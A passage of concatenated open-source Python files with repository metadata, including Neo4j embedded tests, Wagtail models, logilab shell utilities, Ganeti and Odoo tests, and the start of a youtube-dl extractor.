rootTag = 'InstanceSpecParamsType'
rootClass = InstanceSpecParamsType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"')
return rootObj
def parseLiteral(inFileName, silence=False):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'InstanceSpecParamsType'
rootClass = InstanceSpecParamsType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('#from instanceType import *\n\n')
sys.stdout.write('import instanceType as model_\n\n')
sys.stdout.write('rootObj = model_.rootClass(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"InstanceListType",
"InstanceSpecParamsType",
"InstanceType",
"LinkType",
"ResourceType"
]
|
denismakogon/pyvcloud
|
pyvcloud/schema/vchs/ondemand/sc/sc/instanceType.py
|
Python
|
apache-2.0
| 66,418
|
# -*- mode: Python; coding: utf-8 -*-
# Copyright (c) 2002-2013 "Neo Technology,"
# Network Engine for Objects in Lund AB [http://neotechnology.com]
#
# This file is part of Neo4j.
#
# Neo4j is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import unit_tests
import tempfile, os
class GraphTest(unit_tests.GraphDatabaseTest):
def test_create_db(self):
folder_to_put_db_in = tempfile.mkdtemp()
try:
# START SNIPPET: creatingDatabase
from neo4j import GraphDatabase
# Create db
db = GraphDatabase(folder_to_put_db_in)
# Always shut down your database
db.shutdown()
# END SNIPPET: creatingDatabase
finally:
if os.path.exists(folder_to_put_db_in):
import shutil
shutil.rmtree(folder_to_put_db_in)
def test_create_configured_db(self):
folder_to_put_db_in = tempfile.mkdtemp()
try:
# START SNIPPET: creatingConfiguredDatabase
from neo4j import GraphDatabase
# Example configuration parameters
db = GraphDatabase(folder_to_put_db_in, string_block_size=200, array_block_size=240)
db.shutdown()
# END SNIPPET: creatingConfiguredDatabase
finally:
if os.path.exists(folder_to_put_db_in):
import shutil
shutil.rmtree(folder_to_put_db_in)
def test_with_statement_transactions(self):
db = self.graphdb
# START SNIPPET: withBasedTransactions
# Start a transaction
with db.transaction:
# This is inside the transactional
# context. All work done here
# will either entirely succeed,
# or no changes will be applied at all.
# Create a node
node = db.node()
# Give it a name
node['name'] = 'Cat Stevens'
# The transaction is automatically
# commited when you exit the with
# block.
# END SNIPPET: withBasedTransactions
self.assertNotEqual(node, None)
def test_create_node(self):
with self.graphdb.transaction:
node = self.graphdb.node()
self.assertNotEqual(node, None)
def test_delete_node(self):
db = self.graphdb
# START SNIPPET: deleteNode
with db.transaction:
node = db.node()
node.delete()
# END SNIPPET: deleteNode
try:
self.graphdb.node[node.id]
self.assertEqual(True,False)
except Exception, e:
self.assertTrue(isinstance(e, KeyError))
def test_delete_node_by_id(self):
db = self.graphdb
with db.transaction:
node = db.node()
some_node_id = node.id
# START SNIPPET: deleteByIdNode
with db.transaction:
del db.node[some_node_id]
# END SNIPPET: deleteByIdNode
try:
self.graphdb.node[node.id]
self.assertEqual(True,False)
except Exception, e:
self.assertTrue(isinstance(e, KeyError))
def test_create_node_with_properties(self):
db = self.graphdb
# START SNIPPET: createNode
with db.transaction:
# Create a node
thomas = db.node(name='Thomas Anderson', age=42)
# END SNIPPET: createNode
self.assertNotEqual(thomas, None)
self.assertEquals(thomas['name'], 'Thomas Anderson')
self.assertEquals(thomas['age'], 42)
def test_properties(self):
db = self.graphdb
with db.transaction:
node_or_rel = db.node()
# START SNIPPET: setProperties
with db.transaction:
node_or_rel['name'] = 'Thomas Anderson'
node_or_rel['age'] = 42
node_or_rel['favourite_numbers'] = [1,2,3]
node_or_rel['favourite_words'] = ['banana','blue']
# END SNIPPET: setProperties
# START SNIPPET: programaticSetProperties
with db.transaction:
node_or_rel.set('name', 'Thomas Anderson')
# END SNIPPET: programaticSetProperties
# START SNIPPET: getProperties
numbers = node_or_rel['favourite_numbers']
# END SNIPPET: getProperties
# START SNIPPET: programaticGetProperties
numbers = node_or_rel.get_property('favourite_numbers')
# With default value
value = node_or_rel.get_property('some_property', 'defaultvalue')
# END SNIPPET: programaticGetProperties
self.assertEqual(value, 'defaultvalue')
# START SNIPPET: deleteProperties
with db.transaction:
del node_or_rel['favourite_numbers']
# END SNIPPET: deleteProperties
del node_or_rel['favourite_words']
# START SNIPPET: loopProperties
# Loop key and value at the same time
for key, value in node_or_rel.items():
pass
# Loop property keys
for key in node_or_rel.keys():
pass
# Loop property values
for value in node_or_rel.values():
pass
# END SNIPPET: loopProperties
items = list(node_or_rel.items())
self.assertEqual(len(items), 2)
self.assertEqual(items[1][0],'age')
self.assertEqual(items[1][1],42)
keys = list(node_or_rel.keys())
self.assertEqual(len(keys), 2)
self.assertEqual(keys[1],'age')
values = list(node_or_rel.values())
self.assertEqual(len(values), 2)
self.assertEqual(values[1],42)
def test_property_types(self):
with self.graphdb.transaction:
n = self.graphdb.node()
# Booleans
n['a_bool'] = True
self.assertEqual(n['a_bool'], True)
self.assertEqual(type(n['a_bool']), bool)
self.assertEqual(type(n.get_property('a_bool')), bool)
n['a_bool'] = False
self.assertEqual(n['a_bool'], False)
self.assertEqual(type(n['a_bool']), bool)
self.assertEqual(type(n.get_property('a_bool')), bool)
# Strings
n['a_string'] = 'my fancy string I made'
self.assertEqual(n['a_string'], 'my fancy string I made')
self.assertEqual(type(n['a_string']), unicode)
# Longs
n['a_long'] = 1337
self.assertEqual(n['a_long'], 1337)
self.assertEqual(type(n['a_long']), long)
# Lists
n['a_list'] = [1,2,3]
self.assertEqual(n['a_list'], [1,2,3])
self.assertEqual(type(n['a_list']), list)
def test_get_property_with_default(self):
with self.graphdb.transaction:
n = self.graphdb.node()
n['a_bool'] = True
self.assertEqual(n.get_property('a_bool'), True)
self.assertEqual(n.get_property('a_bool', False), True)
self.assertEqual(n.get_property('doesnt_exist'), None)
self.assertEqual(n.get_property('doesnt_exist', False), False)
def test_remove_properties(self):
with self.graphdb.transaction:
node = self.graphdb.node(name='Thomas Anderson', age=42)
self.assertEqual(node['name'], 'Thomas Anderson')
del node['name']
try:
node['name']
self.assertTrue(False)
except Exception, e:
self.assertTrue(isinstance(e, KeyError))
def test_get_node_by_id(self):
db = self.graphdb
with db.transaction:
node = db.node()
some_node_id = node.id
# START SNIPPET: getNodeById
# You don't have to be in a transaction
# to do read operations.
a_node = db.node[some_node_id]
# Ids on nodes and relationships are available via the "id"
# property, eg.:
node_id = a_node.id
# END SNIPPET: getNodeById
self.assertNotEqual(a_node, None)
self.assertEqual(node_id, some_node_id)
def test_get_all_nodes(self):
db = self.graphdb
with db.transaction:
node = db.node()
# START SNIPPET: getAllNodes
for node in db.nodes:
pass
# Shorthand for iterating through
# and counting all nodes
number_of_nodes = len(db.nodes)
# END SNIPPET: getAllNodes
self.assertEqual(2, number_of_nodes)
nodes = list(db.nodes)
self.assertEqual(2, len(nodes))
def test_get_all_relationships(self):
db = self.graphdb
with db.transaction:
node = db.node()
db.reference_node.Knows(node)
node.Knows(db.reference_node)
node.Knows(node)
# START SNIPPET: getAllRelationships
for rel in db.relationships:
pass
# Shorthand for iterating through
# and counting all relationships
number_of_rels = len(db.relationships)
# END SNIPPET: getAllRelationships
self.assertEqual(3, number_of_rels)
rels = list(db.relationships)
self.assertEqual(3, len(rels))
def test_get_reference_node(self):
db = self.graphdb
# START SNIPPET: getReferenceNode
reference = db.reference_node
# END SNIPPET: getReferenceNode
self.assertNotEqual(reference, None)
def test_can_create_relationship(self):
db = self.graphdb
# START SNIPPET: createRelationship
with db.transaction:
# Nodes to create a relationship between
steven = self.graphdb.node(name='Steve Brook')
poplar_bluff = self.graphdb.node(name='Poplar Bluff')
# Create a relationship of type "mayor_of"
relationship = steven.mayor_of(poplar_bluff, since="12th of July 2012")
# Or, to create relationship types with names
# that would not be possible with the above
# method.
steven.relationships.create('mayor_of', poplar_bluff, since="12th of July 2012")
# END SNIPPET: createRelationship
secondrel = poplar_bluff.likes(steven, message="buh")
message = ''
for rel in steven.mayor_of:
message += "%s %s %s" % (
rel.start['name'],
rel['since'],
rel.end['name'],
)
self.assertEquals(message, "Steve Brook 12th of July 2012 Poplar BluffSteve Brook 12th of July 2012 Poplar Bluff")
a_node = steven
# START SNIPPET: accessingRelationships
# All relationships on a node
for rel in a_node.relationships:
pass
# Incoming relationships
for rel in a_node.relationships.incoming:
pass
# Outgoing relationships
for rel in a_node.relationships.outgoing:
pass
# Relationships of a specific type
for rel in a_node.mayor_of:
pass
# Incoming relationships of a specific type
for rel in a_node.mayor_of.incoming:
pass
# Outgoing relationships of a specific type
for rel in a_node.mayor_of.outgoing:
pass
# END SNIPPET: accessingRelationships
self.assertEquals(len(steven.relationships), 3)
self.assertEquals(len(steven.relationships.incoming), 1)
self.assertEquals(len(steven.relationships.outgoing), 2)
self.assertEquals(len(steven.likes), 1)
self.assertEquals(len(steven.likes.incoming), 1)
self.assertEquals(len(steven.likes.outgoing), 0)
def test_relationship_attributes(self):
db = self.graphdb
with db.transaction:
source = self.graphdb.node()
target = self.graphdb.node()
# Create a relationship of type "related_to"
relationship = source.related_to(target)
# START SNIPPET: relationshipAttributes
relationship_type = relationship.type
start_node = relationship.start
end_node = relationship.end
# END SNIPPET: relationshipAttributes
rel = relationship
self.assertEquals(rel.type.name(), 'related_to')
self.assertEquals(rel.start, source)
self.assertEquals(rel.end, target)
def test_get_relationship_by_id(self):
db = self.graphdb
with db.transaction:
source = self.graphdb.node()
target = self.graphdb.node()
rel = source.Knows(target)
a_relationship_id = rel.id
# START SNIPPET: getRelationshipById
the_relationship = db.relationship[a_relationship_id]
# END SNIPPET: getRelationshipById
self.assertNotEqual(the_relationship, None)
def test_delete_relationship(self):
db = self.graphdb
# START SNIPPET: deleteRelationship
with db.transaction:
# Create a relationship
source = db.node()
target = db.node()
rel = source.Knows(target)
# Delete it
rel.delete()
# END SNIPPET: deleteRelationship
try:
self.graphdb.relationship[rel.id]
self.assertTrue(False)
except Exception, e:
self.assertTrue(isinstance(e, KeyError))
def test_delete_relationship_by_id(self):
db = self.graphdb
with db.transaction:
node1 = self.graphdb.node()
node2 = self.graphdb.node()
rel = node1.Knows(node2)
some_relationship_id = rel.id
# START SNIPPET: deleteByIdRelationship
with db.transaction:
del db.relationship[some_relationship_id]
# END SNIPPET: deleteByIdRelationship
try:
self.graphdb.relationship[rel.id]
self.assertTrue(False)
except Exception, e:
self.assertTrue(isinstance(e, KeyError))
if __name__ == '__main__':
unit_tests.unittest.main()
|
neo4j-contrib/python-embedded
|
src/test/python/core.py
|
Python
|
gpl-3.0
| 15,319
|
from __future__ import absolute_import, unicode_literals
from basic_site import models as basic_site_models
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from wagtail.wagtailadmin.edit_handlers import (FieldPanel, MultiFieldPanel,
PageChooserPanel)
from wagtail.wagtailcore.models import Page
from blog.models import BlogIndexPage, BlogPage
from core.mixin import FeatureMixin, PaginatedListPageMixin
from micro.models import MicroPage
class LindBasePage(Page, basic_site_models.BasePage, FeatureMixin):
def __init__(self, *args, **kwargs):
super(LindBasePage, self).__init__(*args, **kwargs)
for field in self._meta.fields:
if field.name == 'first_published_at':
field.editable = True
field.blank = True
content_panels = Page.content_panels + [
FieldPanel('body', classname="full"),
]
promote_panels = Page.promote_panels + FeatureMixin.promote_panels
settings_panels = [FieldPanel('first_published_at'), ] + Page.settings_panels
class PageList(models.Model):
class Meta:
abstract = True
def pages(self):
blog_content_type = ContentType.objects.get_for_model(
BlogPage)
page_content_type = ContentType.objects.get_for_model(
LindBasePage)
pages = Page.objects.live().filter(
models.Q(content_type=blog_content_type)
| models.Q(content_type=page_content_type)
)
pages = pages.order_by('-first_published_at')
return pages
class SiteIndexPage(PaginatedListPageMixin, Page, PageList):
subpage_types = [
LindBasePage,
BlogIndexPage,
MicroPage,
]
posts_per_page = models.IntegerField(default=10)
counter_field_name = 'posts_per_page'
counter_context_name = 'posts'
@property
def subpages(self):
all_pages = self.pages()
page_list = []
for page in all_pages.all():
typed_page = page.content_type.get_object_for_this_type(
id=page.id)
page_list.append(typed_page)
return page_list
SiteIndexPage.content_panels = [
FieldPanel('title', classname="full title"),
FieldPanel('posts_per_page'),
]
@python_2_unicode_compatible
class HomePage(Page, PageList):
subpage_types = [
LindBasePage,
BlogIndexPage,
SiteIndexPage,
MicroPage,
]
featured_item = models.ForeignKey(
'wagtailcore.Page',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
number_homepage_items = models.IntegerField(default=3, verbose_name="Items on Homepage")
more_link = False
def latest(self):
latest = self.pages().exclude(pk=self.featured_item.pk)[:self.number_homepage_items]
return latest
def more_link(self):
if len(self.pages()) > self.number_homepage_items:
more_link = True
return more_link
def __str__(self):
return self.title
content_panels = Page.content_panels + [
MultiFieldPanel(
[
PageChooserPanel("featured_item", "wagtailcore.Page"),
],
heading="Main Feature"
),
MultiFieldPanel(
[
FieldPanel("number_homepage_items"),
],
heading="Homepage Feed"
),
]
|
OpenCanada/lindinitiative
|
core/models.py
|
Python
|
mit
| 3,564
|
# -*- coding: utf-8 -*-
from .api_server import API
app = API()
|
business-factory/captain-hook
|
hooks/app.py
|
Python
|
mit
| 66
|
# copyright 2003-2011 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of logilab-common.
#
# logilab-common is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option) any
# later version.
#
# logilab-common is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-common. If not, see <http://www.gnu.org/licenses/>.
"""shell/term utilities, useful to write some python scripts instead of shell
scripts.
"""
__docformat__ = "restructuredtext en"
import os
import glob
import shutil
import stat
import sys
import tempfile
import time
import fnmatch
import errno
import string
import random
from os.path import exists, isdir, islink, basename, join
from logilab.common import STD_BLACKLIST, _handle_blacklist
from logilab.common.compat import raw_input
from logilab.common.compat import str_to_bytes
try:
from logilab.common.proc import ProcInfo, NoSuchProcess
except ImportError:
# windows platform
class NoSuchProcess(Exception): pass
def ProcInfo(pid):
raise NoSuchProcess()
class tempdir(object):
def __enter__(self):
self.path = tempfile.mkdtemp()
return self.path
def __exit__(self, exctype, value, traceback):
# rmtree in all cases
shutil.rmtree(self.path)
return traceback is None
class pushd(object):
def __init__(self, directory):
self.directory = directory
def __enter__(self):
self.cwd = os.getcwd()
os.chdir(self.directory)
return self.directory
def __exit__(self, exctype, value, traceback):
os.chdir(self.cwd)
def chown(path, login=None, group=None):
"""Same as `os.chown` function but accepting user login or group name as
argument. If login or group is omitted, it's left unchanged.
Note: you must own the file to chown it (or be root). Otherwise OSError is raised.
"""
if login is None:
uid = -1
else:
try:
uid = int(login)
except ValueError:
import pwd # Platforms: Unix
uid = pwd.getpwnam(login).pw_uid
if group is None:
gid = -1
else:
try:
gid = int(group)
except ValueError:
import grp
gid = grp.getgrnam(group).gr_gid
os.chown(path, uid, gid)
def mv(source, destination, _action=shutil.move):
"""A shell-like mv, supporting wildcards.
"""
sources = glob.glob(source)
if len(sources) > 1:
assert isdir(destination)
for filename in sources:
_action(filename, join(destination, basename(filename)))
else:
try:
source = sources[0]
except IndexError:
raise OSError('No file matching %s' % source)
if isdir(destination) and exists(destination):
destination = join(destination, basename(source))
try:
_action(source, destination)
except OSError, ex:
raise OSError('Unable to move %r to %r (%s)' % (
source, destination, ex))
def rm(*files):
"""A shell-like rm, supporting wildcards.
"""
for wfile in files:
for filename in glob.glob(wfile):
if islink(filename):
os.remove(filename)
elif isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
def cp(source, destination):
"""A shell-like cp, supporting wildcards.
"""
mv(source, destination, _action=shutil.copy)
def find(directory, exts, exclude=False, blacklist=STD_BLACKLIST):
"""Recursively find files ending with the given extensions from the directory.
:type directory: str
:param directory:
directory where the search should start
:type exts: basestring or list or tuple
:param exts:
extensions or lists or extensions to search
:type exclude: boolean
:param exts:
if this argument is True, returning files NOT ending with the given
extensions
:type blacklist: list or tuple
:param blacklist:
optional list of files or directory to ignore, default to the value of
`logilab.common.STD_BLACKLIST`
:rtype: list
:return:
the list of all matching files
"""
if isinstance(exts, basestring):
exts = (exts,)
if exclude:
def match(filename, exts):
for ext in exts:
if filename.endswith(ext):
return False
return True
else:
def match(filename, exts):
for ext in exts:
if filename.endswith(ext):
return True
return False
files = []
for dirpath, dirnames, filenames in os.walk(directory):
_handle_blacklist(blacklist, dirnames, filenames)
# don't append files if the directory is blacklisted
dirname = basename(dirpath)
if dirname in blacklist:
continue
files.extend([join(dirpath, f) for f in filenames if match(f, exts)])
return files
def globfind(directory, pattern, blacklist=STD_BLACKLIST):
"""Recursively finds files matching glob `pattern` under `directory`.
This is an alternative to `logilab.common.shellutils.find`.
:type directory: str
:param directory:
directory where the search should start
:type pattern: basestring
:param pattern:
the glob pattern (e.g *.py, foo*.py, etc.)
:type blacklist: list or tuple
:param blacklist:
optional list of files or directory to ignore, default to the value of
`logilab.common.STD_BLACKLIST`
:rtype: iterator
:return:
iterator over the list of all matching files
"""
for curdir, dirnames, filenames in os.walk(directory):
_handle_blacklist(blacklist, dirnames, filenames)
for fname in fnmatch.filter(filenames, pattern):
yield join(curdir, fname)
def unzip(archive, destdir):
import zipfile
if not exists(destdir):
os.mkdir(destdir)
zfobj = zipfile.ZipFile(archive)
for name in zfobj.namelist():
if name.endswith('/'):
os.mkdir(join(destdir, name))
else:
outfile = open(join(destdir, name), 'wb')
outfile.write(zfobj.read(name))
outfile.close()
class Execute:
"""This is a deadlock safe version of popen2 (no stdin), that returns
an object with errorlevel, out and err.
"""
def __init__(self, command):
outfile = tempfile.mktemp()
errfile = tempfile.mktemp()
self.status = os.system("( %s ) >%s 2>%s" %
(command, outfile, errfile)) >> 8
self.out = open(outfile, "r").read()
self.err = open(errfile, "r").read()
os.remove(outfile)
os.remove(errfile)
def acquire_lock(lock_file, max_try=10, delay=10, max_delay=3600):
"""Acquire a lock represented by a file on the file system
If the process written in lock file doesn't exist anymore, we remove the
lock file immediately
If age of the lock_file is greater than max_delay, then we raise a UserWarning
"""
count = abs(max_try)
while count:
try:
fd = os.open(lock_file, os.O_EXCL | os.O_RDWR | os.O_CREAT)
os.write(fd, str_to_bytes(str(os.getpid())) )
os.close(fd)
return True
except OSError, e:
if e.errno == errno.EEXIST:
try:
fd = open(lock_file, "r")
pid = int(fd.readline())
pi = ProcInfo(pid)
age = (time.time() - os.stat(lock_file)[stat.ST_MTIME])
if age / max_delay > 1 :
raise UserWarning("Command '%s' (pid %s) has locked the "
"file '%s' for %s minutes"
% (pi.name(), pid, lock_file, age/60))
except UserWarning:
raise
except NoSuchProcess:
os.remove(lock_file)
except Exception:
# The try block is not essential. can be skipped.
# Note: ProcInfo object is only available for linux
# process information are not accessible...
# or lock_file is no more present...
pass
else:
raise
count -= 1
time.sleep(delay)
else:
raise Exception('Unable to acquire %s' % lock_file)
def release_lock(lock_file):
"""Release a lock represented by a file on the file system."""
os.remove(lock_file)
class ProgressBar(object):
"""A simple text progression bar."""
def __init__(self, nbops, size=20, stream=sys.stdout, title=''):
if title:
self._fstr = '\r%s [%%-%ss]' % (title, int(size))
else:
self._fstr = '\r[%%-%ss]' % int(size)
self._stream = stream
self._total = nbops
self._size = size
self._current = 0
self._progress = 0
self._current_text = None
self._last_text_write_size = 0
def _get_text(self):
return self._current_text
def _set_text(self, text=None):
if text != self._current_text:
self._current_text = text
self.refresh()
def _del_text(self):
self.text = None
text = property(_get_text, _set_text, _del_text)
def update(self, offset=1, exact=False):
"""Move FORWARD to new cursor position (cursor will never go backward).
:offset: fraction of ``size``
:exact:
- False: offset relative to current cursor position if True
- True: offset as an asbsolute position
"""
if exact:
self._current = offset
else:
self._current += offset
progress = int((float(self._current)/float(self._total))*self._size)
if progress > self._progress:
self._progress = progress
self.refresh()
def refresh(self):
"""Refresh the progression bar display."""
self._stream.write(self._fstr % ('.' * min(self._progress, self._size)) )
if self._last_text_write_size or self._current_text:
template = ' %%-%is' % (self._last_text_write_size)
text = self._current_text
if text is None:
text = ''
self._stream.write(template % text)
self._last_text_write_size = len(text.rstrip())
self._stream.flush()
def finish(self):
self._stream.write('\n')
self._stream.flush()
class DummyProgressBar(object):
__slot__ = ('text',)
def refresh(self):
pass
def update(self):
pass
def finish(self):
pass
_MARKER = object()
class progress(object):
def __init__(self, nbops=_MARKER, size=_MARKER, stream=_MARKER, title=_MARKER, enabled=True):
self.nbops = nbops
self.size = size
self.stream = stream
self.title = title
self.enabled = enabled
def __enter__(self):
if self.enabled:
kwargs = {}
for attr in ('nbops', 'size', 'stream', 'title'):
value = getattr(self, attr)
if value is not _MARKER:
kwargs[attr] = value
self.pb = ProgressBar(**kwargs)
else:
self.pb = DummyProgressBar()
return self.pb
def __exit__(self, exc_type, exc_val, exc_tb):
self.pb.finish()
class RawInput(object):
def __init__(self, input=None, printer=None):
self._input = input or raw_input
self._print = printer
def ask(self, question, options, default):
assert default in options
choices = []
for option in options:
if option == default:
label = option[0].upper()
else:
label = option[0].lower()
if len(option) > 1:
label += '(%s)' % option[1:].lower()
choices.append((option, label))
prompt = "%s [%s]: " % (question,
'/'.join([opt[1] for opt in choices]))
tries = 3
while tries > 0:
answer = self._input(prompt).strip().lower()
if not answer:
return default
possible = [option for option, label in choices
if option.lower().startswith(answer)]
if len(possible) == 1:
return possible[0]
elif len(possible) == 0:
msg = '%s is not an option.' % answer
else:
msg = ('%s is an ambiguous answer, do you mean %s ?' % (
answer, ' or '.join(possible)))
if self._print:
self._print(msg)
else:
print msg
tries -= 1
raise Exception('unable to get a sensible answer')
def confirm(self, question, default_is_yes=True):
default = default_is_yes and 'y' or 'n'
answer = self.ask(question, ('y', 'n'), default)
return answer == 'y'
ASK = RawInput()
def getlogin():
"""avoid using os.getlogin() because of strange tty / stdin problems
(man 3 getlogin)
Another solution would be to use $LOGNAME, $USER or $USERNAME
"""
if sys.platform != 'win32':
import pwd # Platforms: Unix
return pwd.getpwuid(os.getuid())[0]
else:
return os.environ['USERNAME']
def generate_password(length=8, vocab=string.ascii_letters + string.digits):
"""dumb password generation function"""
pwd = ''
for i in xrange(length):
pwd += random.choice(vocab)
return pwd
|
pronto/dotfiles
|
.vim/pylibs/logilab/common/shellutils.py
|
Python
|
bsd-2-clause
| 14,284
|
#
#
# Copyright (C) 2007 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Tags related QA tests.
"""
from ganeti import constants
import qa_rapi
from qa_utils import AssertCommand
_TEMP_TAG_NAMES = ["TEMP-Ganeti-QA-Tag%d" % i for i in range(3)]
_TEMP_TAG_RE = r'^TEMP-Ganeti-QA-Tag\d+$'
_KIND_TO_COMMAND = {
constants.TAG_CLUSTER: "gnt-cluster",
constants.TAG_NODE: "gnt-node",
constants.TAG_INSTANCE: "gnt-instance",
constants.TAG_NODEGROUP: "gnt-group",
}
def _TestTags(kind, name):
"""Generic function for add-tags.
"""
def cmdfn(subcmd):
cmd = [_KIND_TO_COMMAND[kind], subcmd]
if kind != constants.TAG_CLUSTER:
cmd.append(name)
return cmd
for cmd in [
cmdfn("add-tags") + _TEMP_TAG_NAMES,
cmdfn("list-tags"),
["gnt-cluster", "search-tags", _TEMP_TAG_RE],
cmdfn("remove-tags") + _TEMP_TAG_NAMES,
]:
AssertCommand(cmd)
if qa_rapi.Enabled():
qa_rapi.TestTags(kind, name, _TEMP_TAG_NAMES)
def TestClusterTags():
"""gnt-cluster tags"""
_TestTags(constants.TAG_CLUSTER, "")
def TestNodeTags(node):
"""gnt-node tags"""
_TestTags(constants.TAG_NODE, node["primary"])
def TestGroupTags(group):
"""gnt-group tags"""
_TestTags(constants.TAG_NODEGROUP, group)
def TestInstanceTags(instance):
"""gnt-instance tags"""
_TestTags(constants.TAG_INSTANCE, instance["name"])
|
dblia/nosql-ganeti
|
qa/qa_tags.py
|
Python
|
gpl-2.0
| 2,042
|
# -*- coding: utf-8 -*-
from openerp.tests import common
KARMA = {
'ask': 5, 'ans': 10,
'com_own': 5, 'com_all': 10,
'com_conv_all': 50,
'upv': 5, 'dwv': 10,
'edit_own': 10, 'edit_all': 20,
'close_own': 10, 'close_all': 20,
'unlink_own': 10, 'unlink_all': 20,
'gen_que_new': 1, 'gen_que_upv': 5, 'gen_que_dwv': -10,
'gen_ans_upv': 10, 'gen_ans_dwv': -20,
}
class TestForumCommon(common.TransactionCase):
def setUp(self):
super(TestForumCommon, self).setUp()
Forum = self.env['forum.forum']
Post = self.env['forum.post']
# Test users
TestUsersEnv = self.env['res.users'].with_context({'no_reset_password': True})
group_employee_id = self.ref('base.group_user')
group_portal_id = self.ref('base.group_portal')
group_public_id = self.ref('base.group_public')
self.user_employee = TestUsersEnv.create({
'name': 'Armande Employee',
'login': 'Armande',
'alias_name': 'armande',
'email': 'armande.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_employee_id])]
})
self.user_portal = TestUsersEnv.create({
'name': 'Beatrice Portal',
'login': 'Beatrice',
'alias_name': 'beatrice',
'email': 'beatrice.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_portal_id])]
})
self.user_public = TestUsersEnv.create({
'name': 'Cedric Public',
'login': 'Cedric',
'alias_name': 'cedric',
'email': 'cedric.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_public_id])]
})
# Test forum
self.forum = Forum.create({
'name': 'TestForum',
'karma_ask': KARMA['ask'],
'karma_answer': KARMA['ans'],
'karma_comment_own': KARMA['com_own'],
'karma_comment_all': KARMA['com_all'],
'karma_answer_accept_own': 9999,
'karma_answer_accept_all': 9999,
'karma_upvote': KARMA['upv'],
'karma_downvote': KARMA['dwv'],
'karma_edit_own': KARMA['edit_own'],
'karma_edit_all': KARMA['edit_all'],
'karma_close_own': KARMA['close_own'],
'karma_close_all': KARMA['close_all'],
'karma_unlink_own': KARMA['unlink_own'],
'karma_unlink_all': KARMA['unlink_all'],
'karma_comment_convert_all': KARMA['com_conv_all'],
'karma_gen_question_new': KARMA['gen_que_new'],
'karma_gen_question_upvote': KARMA['gen_que_upv'],
'karma_gen_question_downvote': KARMA['gen_que_dwv'],
'karma_gen_answer_upvote': KARMA['gen_ans_upv'],
'karma_gen_answer_downvote': KARMA['gen_ans_dwv'],
'karma_gen_answer_accept': 9999,
'karma_gen_answer_accepted': 9999,
})
self.post = Post.create({
'name': 'TestQuestion',
'content': 'I am not a bird.',
'forum_id': self.forum.id,
'tag_ids': [(0, 0, {'name': 'Tag0', 'forum_id': self.forum.id})]
})
self.answer = Post.create({
'name': 'TestAnswer',
'content': 'I am an anteater.',
'forum_id': self.forum.id,
'parent_id': self.post.id,
})
|
mycodeday/crm-platform
|
website_forum/tests/common.py
|
Python
|
gpl-3.0
| 3,442
|
# encoding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
unified_strdate,
compat_str,
)
class NocoIE(InfoExtractor):
_VALID_URL = r'http://(?:(?:www\.)?noco\.tv/emission/|player\.noco\.tv/\?idvideo=)(?P<id>\d+)'
_TEST = {
'url': 'http://noco.tv/emission/11538/nolife/ami-ami-idol-hello-france/',
'md5': '0a993f0058ddbcd902630b2047ef710e',
'info_dict': {
'id': '11538',
'ext': 'mp4',
'title': 'Ami Ami Idol - Hello! France',
'description': 'md5:4eaab46ab68fa4197a317a88a53d3b86',
'upload_date': '20140412',
'uploader': 'Nolife',
'uploader_id': 'NOL',
'duration': 2851.2,
},
'skip': 'Requires noco account',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
medias = self._download_json(
'https://api.noco.tv/1.0/video/medias/%s' % video_id, video_id, 'Downloading video JSON')
formats = []
for fmt in medias['fr']['video_list']['default']['quality_list']:
format_id = fmt['quality_key']
file = self._download_json(
'https://api.noco.tv/1.0/video/file/%s/fr/%s' % (format_id.lower(), video_id),
video_id, 'Downloading %s video JSON' % format_id)
file_url = file['file']
if not file_url:
continue
if file_url == 'forbidden':
raise ExtractorError(
'%s returned error: %s - %s' % (
self.IE_NAME, file['popmessage']['title'], file['popmessage']['message']),
expected=True)
formats.append({
'url': file_url,
'format_id': format_id,
